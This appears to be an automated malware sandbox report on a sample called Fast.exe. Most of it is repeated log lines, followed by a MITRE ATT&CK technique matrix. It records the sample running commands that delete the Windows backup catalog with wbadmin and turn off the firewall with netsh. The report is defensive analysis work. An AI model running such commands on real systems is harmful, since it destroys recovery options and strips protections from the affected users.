Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA77DF InitializeCriticalSectionAndSpinCount,EnterCriticalSection,QueryPerformanceCounter,QueryPerformanceCounter,GetTickCount,GetCurrentProcessId,GetCurrentThreadId,GetLocalTime,SystemTimeToFileTime,QueryPerformanceCounter,LeaveCriticalSection,2_2_00CA77DF
Source: C:\Users\user\Desktop\Fast.exeCode function: 2_2_00CA3E39 GetVersion,GetCurrentProcess,OpenProcessToken,GetTokenInformation,FindCloseChangeNotification,2_2_00CA3E39

Lowering of HIPS / PFW / Operating System Security Settings

barindex
Deletes the backup plan of Windows
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quiet
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbadmin.exe wbadmin delete catalog -quietJump to behavior
Modifies the windows firewall
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh advfirewall set currentprofile state off
Source: Fast.exe, 00000000.00000003.2693227210.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2705225457.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2767513749.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2087557131.0000000003880000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2759247777.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2541928422.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2610693445.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2463498210.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2832712204.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2750402428.0000000000B30000.00000004.00000800.00020000.00000000.sdmp, Fast.exe, 00000000.00000003.2835072519.0000000000B30000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Fast.exe

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
Scheduled Task/Job		1
Scheduled Task/Job		1
Access Token Manipulation		113
Masquerading		OS Credential Dumping1
System Time Discovery		1
Taint Shared Content		1
Archive Collected Data		1
Encrypted Channel		Exfiltration Over Other Network Medium1
Inhibit System Recovery
CredentialsDomainsDefault Accounts11
Native API		121
Registry Run Keys / Startup Folder		11
Process Injection		2
Disable or Modify Tools		LSASS Memory131
Security Software Discovery		Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAt1
DLL Side-Loading		1
Scheduled Task/Job		12
Virtualization/Sandbox Evasion		Security Account Manager12
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveSteganographyAutomated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook121
Registry Run Keys / Startup Folder		1
Access Token Manipulation		NTDS2
Process Discovery		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
DLL Side-Loading		11
Process Injection		LSA Secrets1
Application Window Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
